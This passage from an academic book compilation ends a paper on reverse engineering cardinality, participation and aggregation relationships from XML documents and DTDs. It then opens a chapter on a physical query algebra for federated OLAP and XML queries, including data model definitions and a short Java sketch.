The many-to-one relationships to be considered should be those implemented by explicit linkages, that is, those defined by ID/IDREF(S) linkages. Otherwise, an element type that implicitly exhibits a one-to-many relationship due to the nested structure and also defines an explicit many-to-one relationship would cause the two referred element types to be considered to be in a many-to-many relationship even though they are actually not related at all.
Participation

Participation concerns whether all instances of a particular element type are involved in a relationship with the corresponding element type. Consider an implicit referential linkage by a parent-child relation, such as a DTD ELEMENT declaration that defines CHILD as a subelement of PARENT. Where there are no other ELEMENT declarations that define CHILD as their child element, all CHILD element instances must appear as the child element of a PARENT element, and hence the participation can be considered to be total, as all instances of CHILD must be involved in the one-to-many cardinality relation with PARENT. If no schema is provided, and if all instances of an element type always appear as the child elements of the same parent element type, the participation is also considered to be total.
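A minimal declaration exhibiting this implicit linkage (the occurrence indicator is an assumption) is:

<!ELEMENT PARENT (CHILD+)>

If no other declaration lists CHILD as a subelement, every CHILD instance participates in the relation with PARENT, so the participation of CHILD is total.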
For explicit referential linkage by ID/IDREF(S) attributes, if all instances of an element type use the same attribute with values referring to instances of the same element type, the relationship is considered to be total participation. Otherwise, the relation is considered to be partial. The DTD of the XML document can only identify the ID/IDREF(S) type attributes and cannot restrict the referring and referred element types. As such, actually parsing the XML document is required to determine the type of participation.
Aggregation

An aggregation means that the creation of a whole part of an element depends on the existence of its component subelements. An aggregation relation is signified by the scenario in which elements of different types are considered to be a single entity and all constituting elements must exist together. An XML document by itself does not provide any facility to enforce such a constraint. At best, the schema can hint at the correlations of the existence of the elements in the corresponding XML document. An implicit referential linkage implying an aggregation relationship arises from a DTD ELEMENT declaration whose subelements are mandatory and non-repeatable.
For example, an ELEMENT declaration that defines student and course as mandatory, non-repeatable subelements of enrollment can restrict the existence of the elements enrollment, student, and course. Furthermore, no student or course elements exist in the document that are not subelements of an enrollment element. However, if there is another ELEMENT declaration in the same DTD that defines student as a subelement of, say, a student_list element, student elements can exist in the document as subelements of a student_list element. As such, the coexistence relationship of the enrollment, student, and course elements no longer holds. Such a coexistence relationship specified in the schema can be extended to more than one nested level. For example, if the existence of a course element must be accompanied by a lecturer element and a tutor element, then the elements enrollment, student, course, lecturer, and tutor must exist as a whole. All these elements are considered as being in an aggregation relationship. From another perspective, an aggregation relationship is actually composed of two one-to-one cardinality relations (course-lecturer and course-tutor) that are both total participation. An exceptional case is if the subelements are actually attributes of the parent element, as in the first example, where it is inappropriate to consider that the involved elements are in an aggregation relationship. As a result, user supervision is needed in the process.

Based on the DTD of the XML document, it is possible to determine the aggregation relationships from the elements. As the requirements of an aggregation relationship are the coexistence of the involved elements and the insignificance of the order of the subelements for a parent element, the nested structure of the elements should first be simplified with the algorithm presented in Figure 8, where T is an aggregation tree.

Figure 8. The algorithm for determining aggregation relationships

Let Settemporary = empty;
For each ELEMENT declaration for element Eparent
    For each child element, Echild
        If Echild is mandatory and non-repeatable
            Add an aggregation relation (Eparent, Echild) to Settemporary;
Let Setaggregation and Setroot = empty;
For each relation R (Eparent, Echild) in Settemporary
    If (∃ tree, T, in Setaggregation) ∧ (Eparent is a node in T) ∧ (Echild is not a node in T)
        Add a path Eparent to Echild to T;
    Else If (∃ tree, T, in Setaggregation) ∧ (Echild is a node of T) ∧ (Eparent is not a node in T)
        If (Echild = root node of T) ∧ (Echild not in Setroot)
            Add the path Eparent to Echild to T;
        Else
            Add Echild to Setroot;
            Remove the sub-tree starting with Echild from T;
            If ∃ sub-tree starting with Echild with multiple nodes
                Add the sub-tree to Setaggregation;
    Else If ∃ tree Ti with a node for Eparent and a tree Tj with Echild as root node
        Merge trees Ti and Tj with a path from the node for Eparent in Ti to the root of Tj;
    Else (¬∃ sub-tree in Setaggregation with a node for either Eparent or Echild)
        Add a new tree with a path Eparent to Echild to Setaggregation;

The determination of aggregation relationships is separated into two parts. The first part discovers the pairs of parent and child elements that must coexist. Once the pairs are determined, the second part of the algorithm treats each pair as a path from the parent element to the child element in a subtree, and these subtrees are merged to form a bigger tree. Eventually, the nodes in each tree must coexist in an aggregation relationship. The second part is straightforward except for a tricky point: If a child element is found to be a nonroot node of a particular subtree, it implies that such an element can have more than one parent element, and the aggregation relation that includes such an element must start with the parent element. An example is a list of ELEMENT declarations in a DTD defining the elements A to F, for which the determined pairs of raw aggregation relations are (A, B), (A, C), (B, D), (C, D), (D, E), and (D, F).
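A set of declarations consistent with these pairs would be, for example, the following; the content models shown are assumptions made for illustration, as the original declarations are described only through the resulting pairs:

<!ELEMENT A (B, C)>
<!ELEMENT B (D)>
<!ELEMENT C (D)>
<!ELEMENT D (E, F)>
<!ELEMENT E (#PCDATA)>
<!ELEMENT F (#PCDATA)>

Here every child is mandatory and non-repeatable, so the first part of the algorithm yields exactly the six pairs listed above.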
[Subtree after processing (A, B), (A, C), and (B, D): root A with children B and C, and D as a child of B. Relations still to be added: (C, D), (D, E), and (D, F).]
When adding the path (C, D) to the subtree, as D is not a root node, D should be removed from the subtree and is considered to be an individual subtree with D as the single node. A
D
Relations to be added B
C
(D, E) and (D, F)
After the path (D, E) and (D, F) is added to the subtree with node D as the root node, two subtrees are obtained. A
B
D
C
E
F
As such, the elements A, B, and C and the elements D, E, and F are considered as being two individual aggregation relationships.
CASE STUDY AND PROTOTYPE

To illustrate the applicability and correctness of the algorithms mentioned in this article, a prototype was built that implements the proposed algorithms. For actually drawing the DTD graph, the algorithm proposed by Shiren, Xiujun, Zhongzhi, and Bing (2001) is used to define the layout of the vertexes on the graph. A sample XML document with its DTD file, as shown in Figure 9, is provided as input to the prototype.
Figure 9. test.xml and test.dtd
For this case study, both ID/IDREF type attributes are considered and the minimum number of common attributes is one. All elements with at least one attribute are sorted in ascending order of the lengths of their attribute lists. Therefore, the order of the elements to be processed is element1, element2, and element3. According to the DTD of the XML document, only one ELEMENT declaration is used for constructing the extended DTD graph as the contents of other element types are EMPTY.
Therefore, only those explicit one-to-many relationships are to be added to the graph, and
the graph will become the one shown in Figures 10 and 11. The detailed derivation of the reverse engineering can be referred to in Shiu (2006).
CONCLUSION

In order to make use of an XML document, software developers and end users must have a thorough understanding of the contents of the document, especially for historical and large XML documents. Sometimes, the schemas of XML documents are missing, and the documents cannot be opened and inspected on the screen due to their huge size. Therefore, it is necessary to determine as much information as possible
regarding the relationships from the elements in the document. By reverse engineering the XML document with DTD, all explicit linkages can be determined, and the resultant DTD graph can be used to verify the correctness of ID/IDREF(S) linkages as any incorrect IDREF(S) linkage will be indicated as an extra cardinality and shown in the extended DTD graph. This article provides algorithms to help the users to understand the relationships
from the elements by reverse engineering data semantics from the XML document, including the following:

1. Cardinality relationships
2. Participation relationships
3. n-ary relationships
4. Aggregation relationships
5. Many-to-many relationships (a special case of cardinality relationships)
Figure 10. The determined data semantics
Figure 11. Extended DTD graph based on the DTD and the determined cardinality references
In summary, to visualize the determined data semantics, a new extended DTD graph is proposed. XML documents natively support one-to-one, one-to-many, and participation data semantics. With a corresponding schema such as DTD, the ID and IDREFS attributes of the elements can be identified, and many-to-many, n-ary, and aggregation relationships can also be determined.
ACKNOWLEDGMENT This article is funded by Strategic Research Grant No. 7002325 of City University of Hong Kong.
REFERENCES An, Y., Borgida, A., & Mylopoulos, J. (2005). Constructing complex semantic mappings between XML data and ontologies. In International Semantic Web Conference ISWC 2005 (pp. 6-20). Booch, G., Christerson, M., Fuchs, M., & Koistinen, J. (1999). UML for XML schema mapping specification. Retrieved from http://xml.coverpages.org/fuchs-uml_xmlschema33.pdf Bosak, J., Bray, T., Connolly, D., Maler, E., Nicol, G., Sperberg-McQueen, C. M., et al. (1998). Guide to the W3C XML specification (XMLspec) DTD, version 2.1. Retrieved from http://www.w3.org/ XML/1998/06/xmlspec-report-v21.htm Böttcher, S., & Steinmetz, R. (2003). A DTD graph based XPath query subsumption test. In Xsym 2003 (pp. 85-99). Bray, T., Paoli, J., Sperberg-McQueen, C. M., Maler, E., & Yergeau, F. (2004). Extensible markup language (XML) 1.0 (3rd ed.). Retrieved from http:// www.w3.org/TR/2004/REC-xml-20040204 Chidlovskii, B. (2001). Schema extraction from XML data: A grammatical inference approach. In
KRDB’01 Workshop (Knowledge Representation and Databases). Deutsch, A., Fernandez, M., & Suciu, D. (1999). Storing semi-structured data with STORED. Paper presented at the SIGMOD Conference, Philadelphia. Fernandez, M., Morishima, A., & Suciu, D. (2001). Publishing relational data in XML: The SilkRoute approach. IEEE Data Engineering Bulletin, 24(2), 12-19. Florescu, D., & Kossmann, D. (1999). Storing and querying XML data using an RDBMS. Bulletin of the Technical Committee on Data Engineering, 22(3), 27-34. Fong, J., & Cheung, S. K. (2005). Translating relational schema into XML schema definition with data semantic preservation and XSD graph. Information and Software Technology, 47(7), 437-462. Fong, J., & Wong, H. K. (2004). XTOPO: An XML-based technology for information highway on the Internet. Journal of Database Management, 15(3), 18-44. Funderburk, J. E., Kiernan, G., Shanmugasundaram, J., Shekita, E., & Wei, C. (2002). XTABLES: Bridging relational technology and XML. IBM Systems Journal, 41(4). Goldman, R., & Widom, J. (1997). DataGuides: Enabling query formulation and optimization in semistructured databases. In Proceedings of the 23rd International Conference on Very Large Data Bases. Kanne, C. C., & Moerkotte, G. (2000). Efficient storage of XML data. In Proceedings of ICDE (p. 198). Kay, M. (1999). DTDGenerator: A tool to generate XML DTDs. Retrieved from http://users.breathe. com/mhkay/saxon/dtdgen.html
Klettke, M., Schneider, L., & Heuer, A. (2002). Metrics for XML document collections. In A. Chaudri & R. Unland (Eds.), XMLDM Workshop, Prague, Czech Republic (pp. 162-176).
Sahuguet, A. (2000). Everything you ever wanted to know about DTDs, but were afraid to ask. In WebDB-2000.
Koike, Y. (2001). A conversion tool from DTD to XML schema. Retrieved from http://www. w3.org/2000/04/schema_hack
Shanmugasundaram, J., Shekita, E., Kiernan, J., Krishnamurthy, R., Viglas, E., Naughton, J., et al. (2008). Schematron. Retrieved from http://www. schematron.com
Lee, D. W., & Chu, W. W. (2000a). Comparative analysis of six XML schema languages. SIGMOD Records, 29(3).
Shiren, Y., Xiujun, G., Zhongzhi, S., & Bing, W. (2001). Tree’s drawing algorithm and visualizing method. In CAD/Graphics’2001.
Lee, D. W., & Chu, W. W. (2000b). Constraintspreserving transformation from {XML} document type definition to relational schema. In International Conference on Conceptual Modeling: The Entity Relationship Approach (pp 323-338).
Shiu, H. (2006). Reverse engineering data semantics from arbitrary XML document. Unpublished master’s thesis, City University of Hong Kong, Hong Kong, China.
Lee, D. W., Mani, M., & Chu, W. W. (2003). Schema conversion methods between XML and relational models. In Knowledge Transformation for the Semantic Web. Lu, S., Sun, Y., Atay, M., & Fotouhi, F. (2003). A new inlining algorithm for mapping XML DTDs to relational schemas. In Proceedings of the First International Workshop on XML Schema and Data Management, in conjunction with the 22nd ACM International Conference on Conceptual Modeling (ER2003). Mello, R., & Heuser, C. (2001). A rule-based conversion of a {DTD} to a conceptual schema. In Lecture notes in computer science (Vol. 2224). Min, J. K., Ahn, J. Y., & Chung, C. W. (2003). Efficient extraction of schemas for XML documents. Information Processing Letters, 85(1). Moh, C., Lim, E., & Ng, W. (2000). DTD-Miner: A tool for mining DTD from XML documents. In Proceedings of the Second International Workshop on Advanced Issues of E-Commerce. RELAX NG. (2003). Retrieved from http://www. relaxng.org
Sperberg-McQueen, C., & Thompson, H. (2000). W3C XML schema. Retrieved from http://www. w3.org/XML/Schema Stayton, B. (2008). DocBook. Retrieved from http://www.docbook.org Tatarinov, I. (2001). A general technique for querying XML documents using a relational database system. SIGMOD Record, 30(3), 261-270. Thiran, P. H., Estiévenart, F., Hainaut, J. L., & Houben, G. J. (2004). Exporting databases in XML: A conceptual and generic approach. In Proceedings of CAiSE Workshops (WISM’04). Trujillo, J., & Luján-Mora, S. (2004). Applying UML and XML for designing and interchanging information for data warehouses and OLAP applications. Journal of Database Management, 15(1), 41-72. World Wide Web Consortium (W3C). (1998). Schema for object-oriented XML. Retrieved from http://www.w3.org/TR/1998/NOTE-SOX19980930 World Wide Web Consortium (W3C). (2003). Document object model DOM. Retrieved from http://www.w3.org/DOM
World Wide Web Consortium (W3C). (2004). Simple API for XML, SAX. Retrieved from http:// www.saxproject.org Zhang, J., Liu, H., Ling, T., Bruckner, R., & Tija, A. (2006). A framework for efficient association
rule mining in XML data. Journal of Database Management, 17(3), 19-40. Zhao, L., & Siau, K. (2007). Information mediation using metamodels: An approach using XML and common warehouse metamodel. Journal of Database Management, 18(3), 69-82.
This work was previously published in the Journal of Database Management, edited by K. Siau, Volume 19, Issue 4, pp. 62-80, copyright 2008 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
Chapter 8.8
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra

Xuepeng Yin, Aalborg University, Denmark
Torben Bach Pedersen, Aalborg University, Denmark
ABSTRACT

In today's OLAP systems, physically integrating fast-changing data (e.g., stock quotes) into a cube is complex and time-consuming. The data is likely to be available in XML format on the World Wide Web (WWW); thus, instead of physical integration, making XML data logically federated with OLAP systems is desirable. In this article, we extend previous work on the logical federation of OLAP and XML data sources by presenting simplified query semantics, a physical query algebra, and a robust OLAP-XML query engine, as well as the query evaluation techniques. Performance experiments with a prototypical implementation suggest that the performance for OLAP-XML federations is comparable to queries on physically integrated data.

INTRODUCTION
Online Analytical Processing (OLAP) technology enables data warehouses to be used effectively for online analysis, providing rapid responses to iterative complex analytical queries. Usually an OLAP system contains a large amount of data, but dynamic data (e.g., stock prices) is not handled well in current OLAP systems. To an OLAP system, a well-designed dimensional hierarchy and a large quantity of pre-aggregated data are the keys. However, trying to maintain these two factors when integrating fast-changing data physically into a cube is complex and timeconsuming, or even impossible. However, the advent of XML makes it very possible that the data is available in XML format on the WWW; thus, making XML data accessible to OLAP systems is greatly needed.
Our overall solution is to logically federate the OLAP and XML data sources. This approach decorates the OLAP cube with virtual dimensions, allowing selections and aggregations to be performed over the decorated cube. In this article, we describe the foundation of a robust federation query engine with the focus on query evaluation, which includes the query semantics, a physical algebra, and query evaluation techniques. First, a query semantics that simplifies earlier definitions (Pedersen, Riis, & Pedersen, 2002) is proposed. Here, redundant and repeated logical operators are removed, and a concise and compact logical query plan can be generated after a federation query is analyzed. Second, a physical query algebra, unlike the previous logical algebra, is able to model the real execution tasks of a federation query. Here, all concrete data retrieval and manipulation operations in the federation are integrated. This means that we obtain a much more precise foundation for performing query optimization and cost estimation. Third, the detailed description of the query evaluation introduces how the modeled execution tasks of a query plan are performed, including the concrete evaluation algorithms and techniques for each physical operator and the general algorithm that organizes and integrates the execution of the operators in a whole plan. In addition, algebrabased query optimization techniques, including the architecture of the optimizer, cost estimation of physical operators, and plans, also are presented. Experiments with the query engine suggest that the query performance of the federation approach is comparable to physical integration. There has been a great deal of previous work on data integration; for instance, on relational data (Hellerstein, Stonebraker, & Caccia, 1999; IBM, n.d.; Oracle, 2005), semi-structured data (Chawathe et al., 1994; Nicolle, Yétongnon, & Simon, 2003), a combination of relational and semi-structured data (Goldman & Widom, 2000; Lahiri, Abiteboul, & Widom, 1999), a combination of object-oriented and semi-structured data (Bae, Kim, & Huh, 2003), and an integration of remote
data warehouses by hypermaterialized views (Triantafillakis, Kanellis, & Martakos, 2004). However, none of these handles the advanced issues related to OLAP systems (e.g., automatic and correct aggregation and dimensions with hierarchies). Some work concerns integrating OLAP and object databases (Gu, Pedersen, & Shoshani, 2000; Pedersen, Shoshani, Gu & Jensen, 2000), which demands rigid schemas (i.e., data is represented by classes and connected by complex associations). In comparison, using XML as the data source, as we do, enables the federation to be applied to any data as long as the data allows XML wrapping, greatly enlarging the applicability. Our previous work (Pedersen et al., 2002) presents a logical federation of OLAP and XML systems, where a logical algebra defines the query semantics, together with a partial, straightforward implementation. In comparison, this article takes a further step and introduces a physical query algebra, and the query evaluation and optimization techniques are implemented in a robust OLAP-XML federation query engine. This article makes the following novel contributions, which are extensions to the most related work (Yin & Pedersen, 2004). First, a robust OLAP-XML federation query engine is presented along with its GUI. Second, query evaluation is described in detail. Here, the evaluation of the physical operators, including component data retrieval, component query construction, and optimization of constructed queries, is presented. In addition, an example is given to show the query evaluation process step-by-step. Third, we also show the cost estimation algorithm for physical plans and how the costs of the physical operators are approximated. The article is organized as follows. We first introduce an example cube and XML document used in the illustrations. Then, an overview of the overall architecture of the federation and the federation query language is given. We define the formal representation of the federation and the federation queries using the logical algebra.
The physical algebra then is introduced, which includes the definitions of the physical operators and examples. In the following sections, we present the query evaluation and optimization techniques, including algorithms, component query construction, and examples. The experiments in performance study compare the performance between the logical and physical federations, whereas the last section offers conclusions about the current OLAP-XML federation and indicates future work that extends the query optimization and evaluation techniques.
CASE STUDY

The TPC-H-based (Transaction Processing Performance Council, 2004) database used in the experiments and illustrations is shown in Figure 1. The OLAP database, called TC, is characterized by a Supplier dimension, a Parts dimension, an Order dimension, and a Time dimension. For each line item, Quantity and ExtendedPrice are measured. An example fact table is shown in Table 1. The XML document is composed of the nation codes and public population data about nations in
Figure 1. Cube schema
Figure 2. Part of the XML data
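The part of the XML data shown in Figure 2 has roughly the following shape; the root element name and the population figures for CN and UK are placeholders, as only DK's value of 5.3 is given in the text:

<Nations>
  <Nation>
    <NationName>DK</NationName>
    <Population>5.3</Population>
  </Nation>
  <Nation>
    <NationName>CN</NationName>
    <Population>...</Population>
  </Nation>
  <Nation>
    <NationName>UK</NationName>
    <Population>...</Population>
  </Nation>
</Nations>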
Table 1. The fact table

Quantity  ExtPrice  Supplier  Part  Order  Day
17        17954     S1        P3    11     2/12/1996
36        73638     S2        P5    18     5/2/1992
28        29983     S2        P4    42     30/3/1994
2         2388      S3        P3    4      8/12/1996
26        26374     S4        P2    20     10/11/1993
millions. An example of the document is illustrated in Figure 2, where each Nation element contains two subelements: NationName and Population. We use the listed three lines as the example data in this article. To connect the dimension values of the level Nation and the populations, a link, Nlink, is defined, which maps dimension values for Nation in the cube to the nodes Nation in the XML document. The next section uses the example cube and XML document to illustrate the federation query language.
FEDERATION OVERVIEW

In this section, we give an overview of the prototypical OLAP-XML federation system, the federation query language, and the basic query evaluation process. The overall architecture of the federation system is shown in Figure 5. Besides the OLAP and the XML components, three auxiliary components have been introduced to hold metadata, link data, and temporary data. Queries are posed to the query engine, which coordinates the execution of queries in the components. In the prototype, MS SQL Server 2000 Enterprise Edition with SP3 is used. More specifically, the
temporary component is the temporary database on SQL Server, and the OLAP component uses MS Analysis Services (AS) and is queried with SQL (Microsoft, 2005b). The XML component is the local file system based on the XML data retrieved from the Web, with MS OPENXML (Microsoft, 2002b) on top. Figure 3 shows a screen shot of the prototypical query engine.

Figure 3. The GUI of the federation query engine

The prototype was programmed in MS Visual J++ 6.0 with Component Object Model (COM) interfaces (Microsoft, 2005a) to take advantage of the existing relational, multidimensional database, and XML technologies from Microsoft. Using the query engine, users can pose queries in the query tab and execute the query by pressing the button with a red flash. The query plan tab in the middle shows the execution plan of the posed query. To its right is the query result tab, where the result data is shown in table format. Messages indicating the processing progress of the posed query are shown in the bottom text box. The current prototype does not have a sophisticated interface and is used only for experimental purposes. The core techniques will be integrated later with the business analysis products of a Danish Business Intelligence (BI) tool vendor, TARGIT (Pedersen, Pedersen, & Pedersen, 2004).

The federation query language is called XML-extended Multidimensional SQL (SQLXM), which has basic clauses similar to SQL (i.e., SELECT, FROM, WHERE, GROUP BY, and HAVING) and uses level expressions (defined later) for referencing external XML data. Figure 4 is an example SQLXM query based on the cube in Figure 1, where the roll-up expression Brand(Part) rolls up to the Brand level from the Part level, and the level expression Nation[ANY]/Nlink/Population connects the dimension level Nation and the decoration XML data Population with a link, Nlink.

Figure 4. An example SQLXM query (a SELECT-FROM-WHERE-GROUP BY statement)

Figure 5. Architecture of the OLAP-XML federation system

As shown in Figure 5, the query engine has three components: query analyzer, query optimizer, and query evaluator. The query engine parses and analyzes the given query and generates the initial logical plan. The plan is expressed in the
logical algebra. The query optimizer generates a plan space for the initial plan, where all the logical plans produce the same output as the original one. Furthermore, the optimizer converts all the logical plans into physical plans by converting the logical operators into physical operators. Then, costs of the plans can be estimated. Finally, the optimizer searches for the best execution plan that has the least evaluation time and passes the plan on to the query evaluator. The evaluator executes
the operators in the given plan and generates the final result. Generally, the component queries are evaluated in the OLAP and XML components in parallel, and the results of these queries are transferred to the temporary component for further processing. Sometimes, the selection predicates on level expressions can be rewritten to new predicates that reference only dimension values and constants and can therefore be evaluated in the OLAP component. We term this technique inlining. In such a situation, some XML queries have to be evaluated before the construction of the OLAP queries in order to rewrite the predicates. Moreover, the underlying OLAP cube may be sliced and aggregated, which leads to less intercomponent data transfer. There are also physical operators in the execution plan that model the processing of the temporary data in the temporary component, where SQL operations are used to process the gathered data. Finally, the final result is produced in a temporary table. The next section formalizes the terms introduced informally in this section.
DATA MODELS

The cube model is defined in terms of a multidimensional cube consisting of a cube name, dimensions, and a fact table. Each dimension comprises two partially ordered sets (posets)
representing hierarchies of levels and the ordering of dimension values. Each level is associated with a set of dimension values. That is, a dimension Di is a two-tuple (LDi, EDi), where LDi is a poset of levels and EDi is a poset of dimension values. LDi is the four-tuple (LSi, ⊑i, ⊤i, ⊥i), where LSi = {li1, ..., lik} is a set of levels, lij (1 ≤ j ≤ k) is a level name, and ⊑i is a partial order on these levels. ⊥i is the bottom level, while ⊤i is the unique ALL level. We shall use lij ∈ Di as a shorthand meaning that the level lij belongs to the poset of levels in dimension Di. The partial order of levels is the containment-ship between two levels in the same dimension (i.e., li1 ⊑i li2 holds if elements in Li2 can be said to contain the elements in Li1). Here, Lik is the set of dimension values of level lik, which is Lik = {eik1, ..., eiklik}. Similarly, we say that e1 ⊑Di e2 if e1 is logically contained in e2 and lij ⊑i lik for e1 ∈ Lij and e2 ∈ Lik. For example, we say 01.21.2000 ⊑DTime 2000, because the day 01.21.2000 is contained in the year 2000. EDi is a poset (∪j Lij, ⊑Di) consisting of the set of all dimension values in the dimension and a partial ordering defined on these. For each level l, we assume a function Roll-upl: L × LSi → P(Di), which, given a dimension value in L and a level in LSi, returns the value's ancestors in the level; that is, Roll-upl(eikh, lij) = {e′ ⏐ eikh ⊑Di e′ ∧ e′ ∈ Lij}. A roll-up expression lij(lik) uses the Roll-up function to aggregate the cube from a lower level lik to a higher level lij, that is, lik ⊑i lij ∧ lik ≠ lij. A fact table F is a relation containing one attribute for each dimension and one attribute for each measure. Thus, F = {(e⊥1, ..., e⊥n, v1, ..., vm) ⏐ (e⊥1, ..., e⊥n) ∈ ⊥1 × ... × ⊥n ∧ (v1, ..., vm) ∈ M ⊆ T1 × ... × Tm}, where n ≥ 1, m ≥ 1, and Tj is the value domain of the jth measure. We also will refer to the jth measure as Mj = {(e⊥1, ..., e⊥n, vj)}. Each measure Mj is associated with a default aggregate function fj: P(Tj) → Tj, where the input is a multiset. Aggregate functions ignore NULL values as in SQL. There may be NULL values for measures in the logical definition, but in a physical implementation, only the non-empty tuples would be
stored in the fact table. An n-dimensional cube, C, is given as: C = (N, D, F), where N is the cube name, D = {D1, ..., Dn} is a set of dimensions, and F is the fact table.

A federation is the data structure on which we perform logical federation operations (e.g., selections, aggregations, and decorations). A federation F is a three-tuple: F = (C, Links, X), where C is an OLAP cube, X is the set of referred XML documents, and Links is a set of links (see the following) between levels in C and documents in X. A link is a relation that connects dimension values with nodes in XML documents. For example, a link Nlink = {(DK, n1), (CN, n2), (UK, n3)} maps each dimension value to a node in the example XML document. Here, n1 is the Nation node with the subnode NationName having the string value DK; n2 is the Nation node with the subnode NationName having the string value CN; and similarly for n3.

An XPath expression (Clark & DeRose, 2005) is a path that selects a set of nodes in an XML document. To allow references to XML data in SQLXM queries, links are used with XPath expressions to define level expressions. A level expression l[SEM]/link/xp consists of a starting level l, a decoration semantic modifier SEM, a link link from l to nodes in one or more XML documents, and a relative XPath expression xp which is applied to these nodes to identify new nodes. For example, Nation[ANY]/Nlink/Population links the dimension value DK with its population data 5.3 (million), which is the string value of the node Population in the context of n1. SEM represents the decoration semantics, ALL, ANY, and CONCAT, which specify how many decoration values should be used when several of them are found for a dimension value through link and xp. The ALL semantics connect each dimension value with all of the linked decoration values, and the ANY semantics just use an arbitrary decoration value for each dimension value, whereas the CONCAT semantics concatenate all the possible decoration values into one.
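The following Java sketch illustrates the dimension and Roll-up definitions above on a tiny Supplier/Nation hierarchy; the class and method names are illustrative and not taken from the prototype.

import java.util.*;

// A small sketch of the dimension model: dimension values, the containment
// order, and the Roll-up function returning a value's ancestors in a given level.
public class Dimension {
    // dimension value -> its parent values (several, if the hierarchy is non-strict)
    private final Map<String, Set<String>> parents = new HashMap<>();
    // dimension value -> the level it belongs to
    private final Map<String, String> levelOf = new HashMap<>();

    void addValue(String value, String level) { levelOf.put(value, level); }

    void addContainment(String child, String parent) {
        parents.computeIfAbsent(child, k -> new HashSet<>()).add(parent);
    }

    /** Roll-up(e, l): all ancestors of e that belong to level l. */
    Set<String> rollUp(String e, String level) {
        Set<String> result = new HashSet<>();
        Deque<String> todo = new ArrayDeque<>(parents.getOrDefault(e, Set.of()));
        Set<String> seen = new HashSet<>();
        while (!todo.isEmpty()) {
            String ancestor = todo.pop();
            if (!seen.add(ancestor)) continue;
            if (level.equals(levelOf.get(ancestor))) result.add(ancestor);
            todo.addAll(parents.getOrDefault(ancestor, Set.of()));
        }
        return result;
    }

    public static void main(String[] args) {
        Dimension supplier = new Dimension();
        supplier.addValue("S1", "Supplier");
        supplier.addValue("DK", "Nation");
        supplier.addContainment("S1", "DK");
        System.out.println(supplier.rollUp("S1", "Nation")); // [DK]
    }
}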
A hierarchy is strict if no dimension value has more than one parent value from the same level (Lenz & Shoshani, 1997). A non-strict hierarchy can lead to incorrect aggregation over a dimension (e.g., some lower-level values will be double-counted). Three types of data are distinguished: c, data that may not be aggregated because fact data is duplicated and may cause incorrect aggregation; α, data that may be averaged but not added; and Σ, data that also may be added. A function AggType: {M1, ..., Mm} × D → {Σ, α, c} returns the aggregation type of a measure Mj when aggregated in a dimension Di ∈ D. Considering only the standard SQL functions, we have that Σ = {SUM, AVG, MAX, MIN, COUNT}, α = {AVG, MAX, MIN, COUNT}, and c = ∅. The next section presents the representations of federation queries in terms of logical operators using the symbols already defined.
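A minimal sketch of the AggType idea, modelling Σ, α, and c as the sets of allowed SQL aggregate functions listed above; the enum and method names are assumptions.

import java.util.EnumSet;
import java.util.Set;

// Sigma, Alpha, and C are modelled as the sets of aggregate functions they allow.
public class AggregationTypes {
    enum AggFunction { SUM, AVG, MAX, MIN, COUNT }

    static final Set<AggFunction> SIGMA = EnumSet.allOf(AggFunction.class);                 // Σ
    static final Set<AggFunction> ALPHA = EnumSet.of(AggFunction.AVG, AggFunction.MAX,
                                                     AggFunction.MIN, AggFunction.COUNT);   // α
    static final Set<AggFunction> C = EnumSet.noneOf(AggFunction.class);                    // c

    /** True if the function f may be applied to a measure of the given type along a dimension. */
    static boolean allowed(Set<AggFunction> aggType, AggFunction f) {
        return aggType.contains(f);
    }

    public static void main(String[] args) {
        // e.g., a measure of type α may be averaged but not summed
        System.out.println(allowed(ALPHA, AggFunction.AVG)); // true
        System.out.println(allowed(ALPHA, AggFunction.SUM)); // false
    }
}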
LOGICAL ALGEBRA AND QUERY SEMANTICS

In previous work (Pedersen et al., 2002), a logical algebra over federations was proposed, which is the basis of our work here. In this section, a brief background introduction to the logical algebra and the original SQLXM query semantics are given. We then propose a simplified version of the original query semantics. The following list summarizes the logical operators.

•  A decoration operator, δ, builds a virtual dimension using the XML data referenced by a level expression. The virtual dimension has the hierarchy in accordance with the cube semantics, which consists of the unique top level, the mid-level of external XML data, and the bottom level linking the measures and the decoration data.
•  A federation selection, σFed, selects data in the federated cube according to user-defined conditions. The cube can have virtual dimensions built from external data, which means that XML data also can be used in the filter. The cube schema is not changed; only facts in the fact table are affected.
•  The generalized federation projection, ΠFed, also lets the federated cube be aggregated over the external XML data. Given a set of argument levels, the generalized projection first removes the dimensions in which no argument levels are present, and then each dimension value is rolled up to the specified level. Finally, facts in the fact table are grouped, aggregated measures are calculated, and other measures not specified in the arguments are removed.
The semantics of an SQLXM query can be expressed in terms of the algebra defined previously. In the following, suppose F = (C, Links, X) is a federation, {⊥p, ..., ⊥q} ⊆ {⊥1, ..., ⊥n}, and {ls, ..., lt} are levels in C such that ⊥s ⊑s ls ∧ ⊥s ≠ ls, ..., ⊥t ⊑t lt ∧ ⊥t ≠ lt. le is used to represent a level expression, l[SEM]/link/xp, where SEM is the semantic modifier, l is a level in C, link ∈ Links is a link from l to documents in X, and xp is an XPath expression. predwhere represents the predicates in the WHERE clause, and predhaving represents the predicates in the HAVING clause. LEΠ = {leuΠ, ..., levΠ} are the level expressions in the SELECT and GROUP BY clauses. LEσwhere are the level expressions in the WHERE clause, and LEσhaving are the level expressions in the HAVING clause. fx, ..., fy are the aggregation functions. A sequence of decoration operations is denoted by Δ; that is, Δ{lei, ..., lej}(F) = δlei(...(δlej(F))...). Here is a prototypical SQLXM query:

SELECT    fx(Mx), ..., fy(My), ⊥p, ..., ⊥q, ls(⊥s), ..., lt(⊥t), leuΠ, ..., levΠ
FROM      F
WHERE     predwhere
GROUP BY  ⊥p, ..., ⊥q, ls(⊥s), ..., lt(⊥t), leuΠ, ..., levΠ
HAVING    predhaving
which can be represented in the following logical algebra (Pedersen et al., 2002):

ΠFed[⊥p, ..., ⊥q, ls(⊥s), ..., lt(⊥t), leuΠ, ..., levΠ](σFed[predhaving](ΔLEσhaving(ΠFed[⊥p, ..., ⊥q, ls(⊥s), ..., lt(⊥t), leuΠ, ..., levΠ](ΔLEΠ(σFed[predwhere](ΔLEσwhere(F)))))))

